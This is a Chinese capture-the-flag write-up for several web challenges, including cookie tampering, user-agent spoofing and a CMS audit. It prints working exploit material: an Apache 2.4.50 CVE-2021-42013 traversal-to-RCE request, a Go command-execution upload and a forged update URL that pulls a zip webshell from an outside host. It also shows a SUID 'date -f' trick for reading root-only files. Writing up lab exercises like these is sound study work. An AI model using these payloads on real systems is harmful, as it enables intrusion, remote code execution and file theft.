Power Cookie

发现set-cookie:admin=0

image-20220524205716311

因此添加cookie:admin=1即可

image-20220524205803424

魔法浏览器

f12看到一串js代码,控制台打印得到ua头

image-20220524210121097

更换UA头后得到flag

image-20220524210244195

getme

页面源码有提示

抓包发现Apache/2.4.50

搜索发现该版本存在CVE-2021-42013,存在目录穿越,可以直接读取文件或rce

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: node4.buuoj.cn:25647
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 06 May 2022 14:36:36 GMT
If-None-Match: "8d-5de58c91a8500"
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

echo;cat /diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg

image-20220521205000335

hackme

访问users会提示

image-20220524211058705

所以只需上传一个users.go文件即可

没学过go,网上找的

package main
import (
"bytes"
"fmt"
"log"
"os/exec"
)
// ShellToUse is the interpreter handed every command string in Shellout.
const ShellToUse = "bash"

// Shellout executes command through ShellToUse ("bash -c <command>") and
// captures both output streams. The return order is (error, stdout, stderr),
// preserved from the original signature even though Go convention puts the
// error last. The command string reaches the shell unparsed, so it must come
// from a trusted source, never from external input.
func Shellout(command string) (error, string, string) {
	var outBuf, errBuf bytes.Buffer
	proc := exec.Command(ShellToUse, "-c", command)
	proc.Stdout, proc.Stderr = &outBuf, &errBuf
	runErr := proc.Run()
	return runErr, outBuf.String(), errBuf.String()
}
// main runs "cat /flag" through Shellout and prints both captured streams
// under fixed headers. A non-nil error is logged but does not stop the
// output from being printed.
func main() {
	runErr, stdout, stderr := Shellout("cat /flag")
	if runErr != nil {
		log.Printf("error: %v\n", runErr)
	}
	for _, line := range []string{"--- stdout ---", stdout, "--- stderr ---", stderr} {
		fmt.Println(line)
	}
}

image-20220524210902130

当时没做出来:没想到文件必须命名为users.go,一直随便命名,所以一直不对;因为没学过go,还以为是网上找的代码有问题……

fxxkgo

go的代码审计,告辞

ezcms

唉,这种cms的审计还是不会,得找时间补补

用Seay打开,自动审计出几百个漏洞点

看wp知道,这题的漏洞点在这(话说正常做题的话是要一个个看下来吗)

image-20220524222649078

Update.php

<?php
/*
'软件名称:漫城CMS(Mccms)
'官方网站:http://www.mccms.cn/
'软件作者:桂林崇胜网络科技有限公司(By:烟雨江南)
'--------------------------------------------------------
'Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
'遵循Apache2开源协议发布,并提供免费使用。
'--------------------------------------------------------
*/
// Framework guard (looks like CodeIgniter's): stop if this file is requested directly
// rather than loaded through the bootstrap that defines BASEPATH.
defined('BASEPATH') OR exit('No direct script access allowed');

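/**
 * Admin "update" controller: downloads a remote zip package and extracts it
 * into the web root (FCPATH).
 *
 * Fix: index() read `token` and computed md5(url . Mc_Encryption_Key) but
 * never compared the two, so the token was no check at all. The comparison
 * is now enforced (constant-time) before anything is downloaded. The local
 * filename is also derived without passing a temporary to end() by
 * reference, and a name of '', '.' or '..' is rejected instead of being
 * used as a path.
 */
class Update extends Mccms_Controller {
    function __construct(){
        parent::__construct();
        //判断是否登陆 (require an authenticated admin session before anything else)
        $this->admin->login();
    }

    /**
     * //更新 — download, verify and unpack an update package.
     *
     * Query parameters (read via $this->input->get()):
     *   url   - sys_auth()-encrypted package URL (decrypted with type 1)
     *   token - md5(<encrypted url> . Mc_Encryption_Key)
     *
     * Every failure path ends in $this->msg(), which prints a status page
     * and exit()s, so no statement below a failed check is reached.
     *
     * @return void never returns normally (msg() exits)
     */
    public function index()
    {
        $zipurl = $this->input->get('url',true);
        $token = $this->input->get('token',true);
        if(empty($zipurl)) $this->msg('更新包地址为空');
        $md5 = md5($zipurl.Mc_Encryption_Key);
        // The token ties the request to the server-side key; hash_equals()
        // avoids a timing side channel on the comparison.
        if(!is_string($token) || !hash_equals($md5, $token)) $this->msg('更新包校验失败');

        //下载文件 (decrypt the package URL with the same key)
        $zipurl = sys_auth($zipurl,1);
        // sys_auth() can return an array for JSON payloads; only a string is a URL here
        if(empty($zipurl) || !is_string($zipurl)) $this->msg('更新包地址错误');
        //获取文件头信息 (header check only; the body is fetched separately below)
        $arr = get_headers($zipurl,true);
        if(!is_array($arr) || !isset($arr['Content-Type']) || $arr['Content-Type'] !== 'application/zip') $this->msg('压缩包不zip类型文件');
        $data = getcurl($zipurl);
        if(empty($data)) $this->msg('获取压缩包失败');
        // The last URL path segment becomes the local filename; explode()
        // into a variable first because end() takes its argument by reference.
        $segments = explode('/', $zipurl);
        $name = end($segments);
        if($name === '' || $name === '.' || $name === '..') $this->msg('更新包地址错误');
        $file_zip = FCPATH."caches/upzip/".$name;
        if(!file_put_contents($file_zip, $data)) $this->msg('压缩包下载失败');
        //解压 (extract into FCPATH with PCLZIP_OPT_REPLACE_NEWER)
        // NOTE(review): no entry-name filtering is visible here; confirm the
        // mczip wrapper rejects archive entries containing '../' before relying on it.
        $this->load->library('mczip');
        $this->mczip->PclZip($file_zip);
        if ($this->mczip->extract(PCLZIP_OPT_PATH, FCPATH, PCLZIP_OPT_REPLACE_NEWER) == 0) {
            unlink($file_zip);
            $this->msg('文件解压失败,或者没有权限覆盖文件~!');
        }else{
            unlink($file_zip);
            $this->msg('版本升级成功~!',1);
        }
    }

    /**
     * Print a status block and stop the request.
     *
     * @param string $txt message HTML; echoed unescaped, so callers pass
     *                    literal text only (every call in this class does)
     * @param int    $zt  0 = failure (red); 1 = success (green) and the
     *                    parent frame is reloaded after 2 seconds
     * @return never exit() is always reached
     */
    public function msg($txt,$zt=0){
        $color = $zt == 0 ? 'red' : '#080';
        echo '<link rel="stylesheet" href="'.Web_Path.'packs/admin/css/style.css"><div style="padding:50px;"><fieldset class="layui-elem-field"><legend><b>更新状态</b></legend><div class="layui-field-box" style="color:'.$color.';font-size:16px;">'.$txt.'</div></fieldset></div>';
        if($zt == 1){
            echo '<script>setTimeout(function(){parent.location.reload();},2000);</script>';
        }
        exit;
    }
}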

可以看到会远程加载一个zip文件然后解压更新

Mc_Encryption_Key为全局常量(由define定义)

image-20220524223002672

sys_auth为加解密函数

image-20220524223230237

getcurl为获取远程内容

image-20220524223243870

因此我们需要传入一个加密过的url地址,该url指向一个包含一句话的zip包

<?php
// Produce the encrypted `url` value consumed by Update::index(); the key
// must be the site's Mc_Encryption_Key and sys_auth() is defined below.
define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');

$packageUrl = 'https://xxx/shell.zip';

echo sys_auth($packageUrl);


/**
 * Reversible string codec (RC4-shaped keystream over a framed plaintext),
 * used here to wrap the update-package URL.
 *
 * @param string|array $string plaintext for $type 0 (arrays are json_encode()d),
 *                             or a token produced by this function for $type 1
 * @param int          $type   0 = encrypt/encode, 1 = decrypt/verify
 * @param string       $key    secret; '' falls back to the Mc_Encryption_Key constant
 * @param int          $expiry lifetime in seconds embedded on encrypt (0 = no expiry)
 * @return string|array on decrypt: the recovered string, the decoded JSON when
 *                      it parses and the text is not numeric, or '' when the
 *                      expiry/integrity check fails; on encrypt: 4-char salt
 *                      followed by base64 without '=' and with '+' turned into '-'
 */
function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
    if(is_array($string)) $string = json_encode($string);
    // undo the URL-friendly '-' substitution applied on encrypt (last line)
    if($type == 1) $string = str_replace('-','+',$string);
    $ckey_length = 4;
    $key = md5($key ? $key : Mc_Encryption_Key);
    // keya feeds the keystream key, keyb feeds the integrity tag
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // salt: on decrypt the token's first 4 chars; on encrypt 4 chars of md5(microtime())
    $keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    // decrypt: drop the salt and base64-decode;
    // encrypt: frame as 10-digit expiry | 16-char prefix of md5($string.$keyb) | $string
    $string = $type == 1 ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // key schedule: permute $box with the key bytes (RC4 KSA shape)
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // stream: XOR each input byte with the next keystream byte (RC4 PRGA shape)
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    } 
    if($type == 1) {
        // accept when expiry is 0 or still in the future and the tag matches.
        // NOTE(review): both comparisons are loose (==) and the tag is a truncated
        // md5 rather than an HMAC — flagged for review, not changed here.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            $result = substr($result, 26);
            $json = json_decode($result,1);
            if(!is_numeric($result) && $json){
                return $json;
            }else{
                return $result;
            }
        }
        return '';
    }
    // encrypt output: salt + base64 (padding stripped, '+' made URL-safe as '-')
    return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}

然后访问

http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/admin.php/update?url=7cd7JNh1v1QgVwK42dyWMvv4lUhGeXhsJdy2EwOyln9E4mz08u5PxVCL4UTxvhxIN4F00bMKJLfsduaC6fMc

蚁剑连接

http://18ec60d1-d0cd-4e59-a1f3-684c79c6928a.node4.buuoj.cn:81/shell.php

image-20220524223509940

但这题好像有好多非预期,也就是说这个cms还有好多漏洞,抽空可以试着审一审

rootme

这题是misc里的,已经不碰misc了,但看了眼wp,感觉这题更像web题

先ssh连接

ssh ubuntu@node4.buuoj.cn -p 28081

flag在/root/flag.txt中,显然是没有权限读的

查看具有suid的文件

find / -perm -u=s -type f 2>/dev/null

image-20220524183048853

发现date

date其实是可以读文件的

date -f /root/flag.txt

image-20220524183259878
